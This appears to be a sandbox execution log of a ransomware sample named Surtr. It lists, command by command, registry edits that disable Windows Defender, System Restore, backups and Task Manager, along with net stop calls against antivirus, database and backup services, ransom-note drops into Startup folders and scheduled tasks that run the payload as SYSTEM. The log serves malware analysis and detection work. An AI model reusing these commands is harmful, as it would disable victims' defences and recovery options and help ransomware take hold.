C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McShield"3⤵
-
C:\Windows\system32\net.exenet stop "McShield"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfemms"3⤵
-
C:\Windows\system32\net.exenet stop "mfemms"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfemms"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEMGT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfevtp"3⤵
-
C:\Windows\system32\net.exenet stop "mfevtp"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfevtp"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MMS"3⤵
-
C:\Windows\system32\net.exenet stop "MMS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MMS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mozyprobackup"3⤵
-
C:\Windows\system32\net.exenet stop "mozyprobackup"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mozyprobackup"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\net.exenet stop "VMware NAT Service"5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer"3⤵
-
C:\Windows\system32\net.exenet stop "MsDtsServer"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"3⤵
-
C:\Windows\system32\net.exenet stop "MsDtsServer100"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer100"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"3⤵
-
C:\Windows\system32\net.exenet stop "MsDtsServer110"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer110"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeES"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeES"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeES"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeIS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeIS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeMGMT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMGMT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeMTA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMTA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeSA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeSRS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSRS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "MSOLAP$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "MSOLAP$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPSAMA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$BKUPEXEC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"3⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"3⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$ECWDB2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$ECWDB2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTICEMGT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTTICEBGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"3⤵
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\ProgramData\Service"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SHAREPOINT"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2012"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$PROFXENGAGEMENT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SBSMONITORING"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SHAREPOINT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPSAMA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLSERVER"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLSERVER"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper100"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper100"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"3⤵
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerOLAPService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerOLAPService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL80"3⤵
-
C:\Windows\system32\net.exenet stop "MySQL80"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL80"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL57"3⤵
-
C:\Windows\system32\net.exenet stop "MySQL57"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL57"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"3⤵
-
C:\Windows\system32\net.exenet stop "OracleClientCache80"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "OracleClientCache80"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "PDVFSService"3⤵
-
C:\Windows\system32\net.exenet stop "PDVFSService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PDVFSService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "POP3Svc"3⤵
-
C:\Windows\system32\net.exenet stop "POP3Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "POP3Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$TPSAMA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "RESvc"3⤵
-
C:\Windows\system32\net.exenet stop "RESvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "RESvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sacsvr"3⤵
-
C:\Windows\system32\net.exenet stop "sacsvr"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sacsvr"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SamSs"3⤵
-
C:\Windows\system32\net.exenet stop "SamSs"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVAdminService"3⤵
-
C:\Windows\system32\net.exenet stop "SAVAdminService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVAdminService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVService"3⤵
-
C:\Windows\system32\net.exenet stop "SAVService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Smcinst"3⤵
-
C:\Windows\system32\net.exenet stop "Smcinst"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Smcinst"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SmcService"3⤵
-
C:\Windows\system32\net.exenet stop "SmcService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SmcService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SMTPSvc"3⤵
-
C:\Windows\system32\net.exenet stop "SMTPSvc"4⤵
-
